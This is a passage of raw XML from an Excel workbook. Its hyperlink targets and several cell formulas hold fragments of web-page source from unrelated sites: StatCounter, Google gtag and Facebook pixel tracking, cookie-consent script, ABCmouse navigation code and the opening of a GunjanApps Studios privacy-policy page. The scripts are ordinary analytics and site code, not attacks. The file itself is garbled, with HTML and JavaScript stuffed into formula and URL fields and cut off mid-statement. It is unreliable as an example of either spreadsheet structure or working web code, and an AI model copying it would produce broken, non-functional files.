Target="http://idzdigital.com%20--%3e_x000D_&#xA;%3cscript%20type=%22text/javascript%22%3e_x000D_&#xA;var%20sc_project=11610447;%20_x000D_&#xA;var%20sc_invisible=1;%20_x000D_&#xA;var%20sc_security=%2292b2e226%22;%20_x000D_&#xA;%3c/script%3e_x000D_&#xA;%20%3cscript%20type=%22text/javascript%22_x000D_&#xA;src=%22https://www.statcounter.com/counter/counter.js%22_x000D_&#xA;async%3e%3c/script%3e_x000D_&#xA;%3cnoscript%3e%3cdiv%20class=%22statcounter%22%3e%3ca%20title=%22Web%20Analytics_x000D_&#xA;Made%20Easy%20-%20StatCounter%22%20href=%22https://statcounter.com/%22_x000D_&#xA;target=%22_blank%22%3e%3cimg%20class=%22statcounter%22_x000D_&#xA;src=%22https://c.statcounter.com/11610447/0/92b2e226/1/%22_x000D_&#xA;alt=%22Web%20Analytics%20Made%20Easy%20-_x000D_&#xA;StatCounter%22%3e%3c/a%3e%3c/div%3e%3c/noscript%3e_x000D_&#xA;%3c!--%20End%20of%20Statcounter%20Code%20--%3e_x000D_&#xA;%3c/body%3e_x000D_&#xA;%3c/html%3e" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://idzdigital.com%20--%3e_x000D_&#xA;%3cscript%20type=%22text/javascript%22%3e_x000D_&#xA;var%20sc_project=11610447;%20_x000D_&#xA;var%20sc_invisible=1;%20_x000D_&#xA;var%20sc_security=%2292b2e226%22;%20_x000D_&#xA;%3c/script%3e_x000D_&#xA;%20%3cscript%20type=%22text/javascript%22_x000D_&#xA;src=%22https://www.statcounter.com/counter/counter.js%22_x000D_&#xA;async%3e%3c/script%3e_x000D_&#xA;%3cnoscript%3e%3cdiv%20class=%22statcounter%22%3e%3ca%20title=%22Web%20Analytics_x000D_&#xA;Made%20Easy%20-%20StatCounter%22%20href=%22https://statcounter.com/%22_x000D_&#xA;target=%22_blank%22%3e%3cimg%20class=%22statcounter%22_x000D_&#xA;src=%22https://c.statcounter.com/11610447/0/92b2e226/1/%22_x000D_&#xA;alt=%22Web%20Analytics%20Made%20Easy%20-_x000D_&#xA;StatCounter%22%3e%3c/a%3e%3c/div%3e%3c/noscript%3e_x000D_&#xA;%3c!--%20End%20of%20Statcounter%20Code%20--%3e_x000D_&#xA;%3c/body%3e_x000D_&#xA;%3c/html%3e" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://idzdigital.com%20--%3e_x000D_&#xA;%3cscript%20type=%22text/javascript%22%3e_x000D_&#xA;var%20sc_project=11610447;%20_x000D_&#xA;var%20sc_invisible=1;%20_x000D_&#xA;var%20sc_security=%2292b2e226%22;%20_x000D_&#xA;%3c/script%3e_x000D_&#xA;%20%3cscript%20type=%22text/javascript%22_x000D_&#xA;src=%22https://www.statcounter.com/counter/counter.js%22_x000D_&#xA;async%3e%3c/script%3e_x000D_&#xA;%3cnoscript%3e%3cdiv%20class=%22statcounter%22%3e%3ca%20title=%22Web%20Analytics_x000D_&#xA;Made%20Easy%20-%20StatCounter%22%20href=%22https://statcounter.com/%22_x000D_&#xA;target=%22_blank%22%3e%3cimg%20class=%22statcounter%22_x000D_&#xA;src=%22https://c.statcounter.com/11610447/0/92b2e226/1/%22_x000D_&#xA;alt=%22Web%20Analytics%20Made%20Easy%20-_x000D_&#xA;StatCounter%22%3e%3c/a%3e%3c/div%3e%3c/noscript%3e_x000D_&#xA;%3c!--%20End%20of%20Statcounter%20Code%20--%3e_x000D_&#xA;%3c/body%3e_x000D_&#xA;%3c/html%3e" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://idzdigital.com%20--%3e_x000D_&#xA;%3cscript%20type=%22text/javascript%22%3e_x000D_&#xA;var%20sc_project=11610447;%20_x000D_&#xA;var%20sc_invisible=1;%20_x000D_&#xA;var%20sc_security=%2292b2e226%22;%20_x000D_&#xA;%3c/script%3e_x000D_&#xA;%20%3cscript%20type=%22text/javascript%22_x000D_&#xA;src=%22https://www.statcounter.com/counter/counter.js%22_x000D_&#xA;async%3e%3c/script%3e_x000D_&#xA;%3cnoscript%3e%3cdiv%20class=%22statcounter%22%3e%3ca%20title=%22Web%20Analytics_x000D_&#xA;Made%20Easy%20-%20StatCounter%22%20href=%22https://statcounter.com/%22_x000D_&#xA;target=%22_blank%22%3e%3cimg%20class=%22statcounter%22_x000D_&#xA;src=%22https://c.statcounter.com/11610447/0/92b2e226/1/%22_x000D_&#xA;alt=%22Web%20Analytics%20Made%20Easy%20-_x000D_&#xA;StatCounter%22%3e%3c/a%3e%3c/div%3e%3c/noscript%3e_x000D_&#xA;%3c!--%20End%20of%20Statcounter%20Code%20--%3e_x000D_&#xA;%3c/body%3e_x000D_&#xA;%3c/html%3e" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:B14415"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <sheetData>
    <row r="1" spans="1:2">
      <c r="A1" s="1">
        <v>0</v>
      </c>
      <c r="B1" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="1:2">
      <c r="A2" t="s">
        <v>0</v>
      </c>
      <c r="B2" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="3" spans="1:2">
      <c r="A3" t="s">
        <v>0</v>
      </c>
      <c r="B3" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="4" spans="1:2">
      <c r="A4" t="s">
        <v>0</v>
      </c>
      <c r="B4" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="5" spans="1:2">
      <c r="A5" t="s">
        <v>0</v>
      </c>
      <c r="B5" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="6" spans="1:2">
      <c r="A6" t="s">
        <v>0</v>
      </c>
      <c r="B6" t="s">
        <v>256</v>
      </c>
    </row>
    <row r="7" spans="1:2">
      <c r="A7" t="s">
        <v>1</v>
      </c>
      <c r="B7" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="8" spans="1:2">
      <c r="A8" t="s">
        <v>2</v>
      </c>
      <c r="B8" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="9" spans="1:2">
      <c r="A9" t="s">
        <v>2</v>
      </c>
      <c r="B9" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="10" spans="1:2">
      <c r="A10" t="s">
        <v>2</v>
      </c>
      <c r="B10" t="s">
        <v>260</v>
      </c>
    </row>
    <row r="11" spans="1:2">
      <c r="A11" t="s">
        <v>2</v>
      </c>
      <c r="B11" t="s">
        <v>261</v>
      </c>
    </row>
    <row r="12" spans="1:2">
      <c r="A12" t="s">
        <v>2</v>
      </c>
      <c r="B12" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="13" spans="1:2">
      <c r="A13" t="s">
        <v>2</v>
      </c>
      <c r="B13" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="14" spans="1:2">
      <c r="A14" t="s">
        <v>2</v>
      </c>
      <c r="B14" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="15" spans="1:2">
      <c r="A15" t="s">
        <v>2</v>
      </c>
      <c r="B15" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="16" spans="1:2">
      <c r="A16" t="s">
        <v>2</v>
      </c>
      <c r="B16" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="17" spans="1:2">
      <c r="A17" t="s">
        <v>2</v>
      </c>
      <c r="B17" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="18" spans="1:2">
      <c r="A18" t="s">
        <v>2</v>
      </c>
      <c r="B18" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="19" spans="1:2">
      <c r="A19" t="s">
        <v>2</v>
      </c>
      <c r="B19" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="20" spans="1:2">
      <c r="A20" t="s">
        <v>2</v>
      </c>
      <c r="B20" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="21" spans="1:2">
      <c r="A21" t="s">
        <v>2</v>
      </c>
      <c r="B21" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="22" spans="1:2">
      <c r="A22" t="s">
        <v>2</v>
      </c>
      <c r="B22" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="23" spans="1:2">
      <c r="A23" t="s">
        <v>2</v>
      </c>
      <c r="B23" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="24" spans="1:2">
      <c r="A24" t="s">
        <v>2</v>
      </c>
      <c r="B24" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="25" spans="1:2">
      <c r="A25" t="s">
        <v>2</v>
      </c>
      <c r="B25" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="26" spans="1:2">
      <c r="A26" t="s">
        <v>2</v>
      </c>
      <c r="B26" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="27" spans="1:2">
      <c r="A27" t="s">
        <v>2</v>
      </c>
      <c r="B27" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="28" spans="1:2">
      <c r="A28" t="s">
        <v>2</v>
      </c>
      <c r="B28" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="29" spans="1:2">
      <c r="A29" t="s">
        <v>2</v>
      </c>
      <c r="B29" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="30" spans="1:2">
      <c r="A30" t="s">
        <v>2</v>
      </c>
      <c r="B30" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="31" spans="1:2">
      <c r="A31" t="s">
        <v>2</v>
      </c>
      <c r="B31" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="32" spans="1:2">
      <c r="A32" t="s">
        <v>2</v>
      </c>
      <c r="B32" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="33" spans="1:2">
      <c r="A33" t="s">
        <v>2</v>
      </c>
      <c r="B33" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="34" spans="1:2">
      <c r="A34" t="s">
        <v>2</v>
      </c>
      <c r="B34" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="35" spans="1:2">
      <c r="A35" t="s">
        <v>2</v>
      </c>
      <c r="B35" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="36" spans="1:2">
      <c r="A36" t="s">
        <v>2</v>
      </c>
      <c r="B36" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="37" spans="1:2">
      <c r="A37" t="s">
        <v>2</v>
      </c>
      <c r="B37" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="38" spans="1:2">
      <c r="A38" t="s">
        <v>2</v>
      </c>
      <c r="B38" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="39" spans="1:2">
      <c r="A39" t="s">
        <v>2</v>
      </c>
      <c r="B39" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="40" spans="1:2">
      <c r="A40" t="s">
        <v>2</v>
      </c>
      <c r="B40" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="41" spans="1:2">
      <c r="A41" t="s">
        <v>2</v>
      </c>
      <c r="B41" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="42" spans="1:2">
      <c r="A42" t="s">
        <v>2</v>
      </c>
      <c r="B42" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="43" spans="1:2">
      <c r="A43" t="s">
        <v>2</v>
      </c>
      <c r="B43" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="44" spans="1:2">
      <c r="A44" t="s">
        <v>2</v>
      </c>
      <c r="B44" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="45" spans="1:2">
      <c r="A45" t="s">
        <v>2</v>
      </c>
      <c r="B45" t="s">
        <v>295</v>
      </c>
    </row>
    <row r="46" spans="1:2">
      <c r="A46" t="s">
        <v>3</v>
      </c>
      <c r="B46" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="47" spans="1:2">
      <c r="A47" t="s">
        <v>3</v>
      </c>
      <c r="B47" t="s">
        <v>297</v>
      </c>
    </row>
    <row r="48" spans="1:2">
      <c r="A48" t="s">
        <v>3</v>
      </c>
      <c r="B48" t="s">
        <v>298</v>
      </c>
    </row>
    <row r="49" spans="1:2">
      <c r="A49" t="s">
        <v>3</v>
      </c>
      <c r="B49" t="s">
        <v>299</v>
      </c>
    </row>
    <row r="50" spans="1:2">
      <c r="A50" t="s">
        <v>3</v>
      </c>
      <c r="B50" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="51" spans="1:2">
      <c r="A51" t="s">
        <v>3</v>
      </c>
      <c r="B51" t="s">
        <v>301</v>
      </c>
    </row>
    <row r="52" spans="1:2">
      <c r="A52" t="s">
        <v>3</v>
      </c>
      <c r="B52" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="53" spans="1:2">
      <c r="A53" t="s">
        <v>3</v>
      </c>
      <c r="B53" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="54" spans="1:2">
      <c r="A54" t="s">
        <v>4</v>
      </c>
      <c r="B54" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="55" spans="1:2">
      <c r="A55" t="s">
        <v>4</v>
      </c>
      <c r="B55" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="56" spans="1:2">
      <c r="A56" t="s">
        <v>4</v>
      </c>
      <c r="B56" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="57" spans="1:2">
      <c r="A57" t="s">
        <v>4</v>
      </c>
      <c r="B57" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="58" spans="1:2">
      <c r="A58" t="s">
        <v>4</v>
      </c>
      <c r="B58" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="59" spans="1:2">
      <c r="A59" t="s">
        <v>4</v>
      </c>
      <c r="B59" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="60" spans="1:2">
      <c r="A60" t="s">
        <v>4</v>
      </c>
      <c r="B60" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="61" spans="1:2">
      <c r="A61" t="s">
        <v>4</v>
      </c>
      <c r="B61" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="62" spans="1:2">
      <c r="A62" t="s">
        <v>4</v>
      </c>
      <c r="B62" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="63" spans="1:2">
      <c r="A63" t="s">
        <v>4</v>
      </c>
      <c r="B63" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="64" spans="1:2">
      <c r="A64" t="s">
        <v>4</v>
      </c>
      <c r="B64" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="65" spans="1:2">
      <c r="A65" t="s">
        <v>4</v>
      </c>
      <c r="B65" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="66" spans="1:2">
      <c r="A66" t="s">
        <v>5</v>
      </c>
      <c r="B66" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="67" spans="1:2">
      <c r="A67" t="s">
        <v>5</v>
      </c>
      <c r="B67" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="68" spans="1:2">
      <c r="A68" t="s">
        <v>5</v>
      </c>
      <c r="B68" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="69" spans="1:2">
      <c r="A69" t="s">
        <v>5</v>
      </c>
      <c r="B69" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="70" spans="1:2">
      <c r="A70" t="s">
        <v>5</v>
      </c>
      <c r="B70" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="71" spans="1:2">
      <c r="A71" t="s">
        <v>5</v>
      </c>
      <c r="B71" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="72" spans="1:2">
      <c r="A72" t="s">
        <v>5</v>
      </c>
      <c r="B72" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="73" spans="1:2">
      <c r="A73" t="s">
        <v>5</v>
      </c>
      <c r="B73">
        <f> window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-84213520-6');
&lt;/script&gt; --&gt;
&lt;script&gt;
    window.addEventListener("load", function(){
        window.cookieconsent.initialise({
            "palette": {
                "popup": {
                    "background": "#000"
                },
                "button": {
                    "background": "#f1d600"
                }
            },
            "position": "bottom-left"
        })});
&lt;/script&gt;
&lt;!-- All JS --&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-1.11.0.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-migrate-1.2.1.min.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/greensock.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.easing.1.3.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.transitions.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.kreaturamedia.jquery.js " defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/cookieconsent.min.js"&gt;&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:2">
      <c r="A74" t="s">
        <v>5</v>
      </c>
      <c r="B74" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="75" spans="1:2">
      <c r="A75" t="s">
        <v>5</v>
      </c>
      <c r="B75" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="76" spans="1:2">
      <c r="A76" t="s">
        <v>5</v>
      </c>
      <c r="B76" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="77" spans="1:2">
      <c r="A77" t="s">
        <v>5</v>
      </c>
      <c r="B77" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="78" spans="1:2">
      <c r="A78" t="s">
        <v>5</v>
      </c>
      <c r="B78" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="79" spans="1:2">
      <c r="A79" t="s">
        <v>5</v>
      </c>
      <c r="B79" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="80" spans="1:2">
      <c r="A80" t="s">
        <v>5</v>
      </c>
      <c r="B80" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="81" spans="1:2">
      <c r="A81" t="s">
        <v>5</v>
      </c>
      <c r="B81" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="82" spans="1:2">
      <c r="A82" t="s">
        <v>5</v>
      </c>
      <c r="B82" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="83" spans="1:2">
      <c r="A83" t="s">
        <v>5</v>
      </c>
      <c r="B83" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="84" spans="1:2">
      <c r="A84" t="s">
        <v>5</v>
      </c>
      <c r="B84">
        <f> $(window).scrollTop();
    if (scrollTop &gt; 249) {
        // $('.header').addClass('fadeOutLeft');
        // $('.header').removeClass('fadeInLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeOutUp');
        $('.header-sticky').addClass('animated');      
    } else {
        // $('.header').addClass('fadeInLeft');
        // $('.header').removeClass('fadeOutLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeInDown');
    }
  });
});
&lt;/script&gt;
&lt;style type="text/css"&gt;
.header-sticky.fadeInDown {
    position: fixed;
    width: 100%;
    opacity: 0;
    z-index: 999;
}
&lt;/style&gt;
    &lt;div class="page-banner" style="background-image: url(https://gunjanappstudios.com/public/uploads/banner_privacy.png)"&gt;
        &lt;div class="bg-page"&gt;&lt;/div&gt;
        &lt;div class="text"&gt;
            &lt;h1&gt;Privacy Policy&lt;/h1&gt;
            &lt;nav aria-label="breadcrumb"&gt;
                &lt;ol class="breadcrumb justify-content-center"&gt;
                    &lt;li class="breadcrumb-item"&gt;&lt;a href="https://gunjanappstudios.com"&gt;Home&lt;/a&gt;&lt;/li&gt;
                    &lt;li class="breadcrumb-item active" aria-current="page"&gt;Privacy Policy&lt;/li&gt;
                &lt;/ol&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
        &lt;div id="privacy-policy"&gt;&lt;/div&gt;
    &lt;/div&gt;
    &lt;!--mobile banner--&gt;
    &lt;div class="mobile-banner"&gt;
        &lt;img src="https://gunjanappstudios.com/public/uploads/banner_privacy_mobile.png"&gt;
    &lt;/div&gt;
    &lt;div class="page-content"&gt;
        &lt;div class="container"&gt;
            &lt;div class="heading"&gt;
                &lt;h2 class="heding_s"&gt;Privacy Policy&lt;/h2&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-md-12"&gt;
                    &lt;p&gt;_x000D_
                        &lt;b&gt;Privacy Policy&lt;/b&gt;_x000D_
                        &lt;br&gt;_x000D_
                    &lt;/p&gt;_x000D_
                    &lt;p&gt;We respect and value your privacy here at GunjanApps Studios.&lt;/p&gt;_x000D_
                    &lt;p&gt;Our Privacy Policy describes the information collected by our company GunjanApps Studios, and our partners, through our mobile applications and the use of the information.&lt;/p&gt;_x000D_
                    &lt;p&gt;</f>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:2">
      <c r="A85" t="s">
        <v>5</v>
      </c>
      <c r="B85" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="86" spans="1:2">
      <c r="A86" t="s">
        <v>5</v>
      </c>
      <c r="B86" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="87" spans="1:2">
      <c r="A87" t="s">
        <v>5</v>
      </c>
      <c r="B87" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="88" spans="1:2">
      <c r="A88" t="s">
        <v>5</v>
      </c>
      <c r="B88" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="89" spans="1:2">
      <c r="A89" t="s">
        <v>5</v>
      </c>
      <c r="B89" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="90" spans="1:2">
      <c r="A90" t="s">
        <v>5</v>
      </c>
      <c r="B90" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="91" spans="1:2">
      <c r="A91" t="s">
        <v>5</v>
      </c>
      <c r="B91" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="92" spans="1:2">
      <c r="A92" t="s">
        <v>5</v>
      </c>
      <c r="B92" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="93" spans="1:2">
      <c r="A93" t="s">
        <v>5</v>
      </c>
      <c r="B93" t="s">
        <v>341</v>
      </c>
    </row>
    <row r="94" spans="1:2">
      <c r="A94" t="s">
        <v>5</v>
      </c>
      <c r="B94" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="95" spans="1:2">
      <c r="A95" t="s">
        <v>6</v>
      </c>
      <c r="B95" t="s">
        <v>343</v>
      </c>
    </row>
    <row r="96" spans="1:2">
      <c r="A96" t="s">
        <v>6</v>
      </c>
      <c r="B96" t="s">
        <v>344</v>
      </c>
    </row>
    <row r="97" spans="1:2">
      <c r="A97" t="s">
        <v>6</v>
      </c>
      <c r="B97" t="s">
        <v>345</v>
      </c>
    </row>
    <row r="98" spans="1:2">
      <c r="A98" t="s">
        <v>6</v>
      </c>
      <c r="B98" t="s">
        <v>346</v>
      </c>
    </row>
    <row r="99" spans="1:2">
      <c r="A99" t="s">
        <v>6</v>
      </c>
      <c r="B99">
        <f> window.dataLayer || [];_x000D_
            function gtag(){dataLayer.push(arguments);}_x000D_
            gtag('js', new Date());_x000D_
            gtag('config', 'AW-1022130506');_x000D_
            gtag('config', 'AW-10781399584');_x000D_
            &lt;/script&gt;_x000D_
_x000D_
            &lt;!-- Facebook Pixel Code --&gt;_x000D_
            &lt;script&gt;_x000D_
            !</f>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:2">
      <c r="A100" t="s">
        <v>6</v>
      </c>
      <c r="B100" t="s">
        <v>347</v>
      </c>
    </row>
    <row r="101" spans="1:2">
      <c r="A101" t="s">
        <v>6</v>
      </c>
      <c r="B101" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="102" spans="1:2">
      <c r="A102" t="s">
        <v>6</v>
      </c>
      <c r="B102" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="103" spans="1:2">
      <c r="A103" t="s">
        <v>6</v>
      </c>
      <c r="B103">
        <f> -1) { target = "/"; }
                        else if(domain.indexOf(".tw") ! = -1) { target = "/landing"; }
                        window.location = target;
                    });
                    ABCmouseUtils.addClassName(document.getElementById("main_mouse_logo"), "clickable");
                     ABCmouseUtils.addEventListener(document.getElementById("log_in_link"), "click", function() {
                //        console.log ("----- language = '' ----- ");//pl
                        ABCmouseUtils.showIframePopup({url: '/loginbox', width: 492, height: 320, stylePosition: 'absolute', parent_div: 'header', position: {x:400,y:25}, rePosition: false});
                                            });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_log_in"), "click", function() {
                                             ABCmouseUtils.showIframePopup({url: '/loginbox', width: 492, height: 268, stylePosition: 'absolute', parent_div: 'header', position: {x:400,y:25}, rePosition: false});
                                    });
                ABCmouseUtils.addEventListener(document.getElementById("sign_up_link"), "click", function() { window.location = '/subscribe'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_sign_up"), "click", function() { window.location = '/subscribe'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_forgot_pwd"), "click", function() { window.location = '/forgotpwd'; });
                ABCmouseUtils.addEventListener(document.getElementById("spanish_toggle_link"), "click", function() {
                    var lang_cookie = ABCmouseUtils.getCookie("language");
                    if(lang_cookie == "es") { ABCmouseUtils.setCookie("language", "", 0, "/", ".abcmouse.com") }
                    else if(lang_cookie == "") { ABCmouseUtils.setCookie("language", "es", 0, "/", ".abcmouse.com") }
                    location.reload(true);
                });
                                ABCmouseUtils.addEventListener(document.getElementById("schools_page_link"), "click", function() { window.location = '/teachers'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_schools_link"), "click", function() { window.location = '/schools'; });
                ABCmouseUtils.addEventListener(document.getElementById("back_to_home_link"), "click", function() { window.location</f>
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:2">
      <c r="A104" t="s">
        <v>6</v>
      </c>
      <c r="B104">
        <f> '/'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_back_to_home"), "click", function() { window.location = '/'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_straight_to_home"), "click", function() { window.location = '/'; });
                ABCmouseUtils.addEventListener(document.getElementById("header_homepage_link"), "click", function() { window.location = '/'; });
                ABCmouseUtils.addEventListener(document.getElementById("logout_link"), "click", function() { window.location = '/logout'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_log_out"), "click", function() { window.location = '/logout'; });
                ABCmouseUtils.addEventListener(document.getElementById("mobile_homepage_link"), "click", function() { window.location = '/'; }); //pl 01202014
            });
            var IMGHOST = "https://img.abcmouse.com";
            var MOBILE = "";
    &lt;/script&gt;
&lt;!-- Cookies Consent start --&gt;
&lt;script type="text/javascript"&gt;
    function setCookie(cookieName, cookieValue) {
        document.cookie = cookieName + '=' + cookieValue;
    };
    function getCookie(cookieName) {
        var name = cookieName + '=';
        var cookies = document.cookie.split(';');
        for (var i = 0; i &lt; cookies.length; i++) {
            var cookie = cookies[i].trim();
            if (cookie.indexOf(name) == 0) {
                return cookie.substring(name.length, cookie.length);
            }
        }
        return '';
    };
    if (getCookie('ANALYTICS_PERFORMANCE_COOKIES') === '') {
      setCookie('ANALYTICS_PERFORMANCE_COOKIES', 'true');
    }
    if (getCookie('TARGETING_COOKIES') === '') {
      setCookie('TARGETING_COOKIES', 'true');
    }
&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:2">
      <c r="A105" t="s">
        <v>6</v>
      </c>
      <c r="B105" t="s">
        <v>350</v>
      </c>
    </row>
    <row r="106" spans="1:2">
      <c r="A106" t="s">
        <v>6</v>
      </c>
      <c r="B106" t="s">
        <v>351</v>
      </c>
    </row>
    <row r="107" spans="1:2">
      <c r="A107" t="s">
        <v>6</v>
      </c>
      <c r="B107" t="s">
        <v>352</v>
      </c>
    </row>
    <row r="108" spans="1:2">
      <c r="A108" t="s">
        <v>6</v>
      </c>
      <c r="B108" t="s">
        <v>353</v>
      </c>
    </row>
    <row r="109" spans="1:2">
      <c r="A109" t="s">
        <v>6</v>
      </c>
      <c r="B109" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="110" spans="1:2">
      <c r="A110" t="s">
        <v>6</v>
      </c>
      <c r="B110" t="s">
        <v>355</v>
      </c>
    </row>
    <row r="111" spans="1:2">
      <c r="A111" t="s">
        <v>6</v>
      </c>
      <c r="B111" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="112" spans="1:2">
      <c r="A112" t="s">
        <v>6</v>
      </c>
      <c r="B112" t="s">
        <v>357</v>
      </c>
    </row>
    <row r="113" spans="1:2">
      <c r="A113" t="s">
        <v>6</v>
      </c>
      <c r="B113" t="s">
        <v>358</v>
      </c>
    </row>
    <row r="114" spans="1:2">
      <c r="A114" t="s">
        <v>6</v>
      </c>
      <c r="B114" t="s">
        <v>359</v>
      </c>
    </row>
    <row r="115" spans="1:2">
      <c r="A115" t="s">
        <v>6</v>
      </c>
      <c r="B115" t="s">
        <v>360</v>
      </c>
    </row>
    <row r="116" spans="1:2">
      <c r="A116" t="s">
        <v>6</v>
      </c>
      <c r="B116" t="s">
        <v>361</v>
      </c>
    </row>
    <row r="117" spans="1:2">
      <c r="A117" t="s">
        <v>6</v>
      </c>
      <c r="B117" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="118" spans="1:2">
      <c r="A118" t="s">
        <v>6</v>
      </c>
      <c r="B118" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="119" spans="1:2">
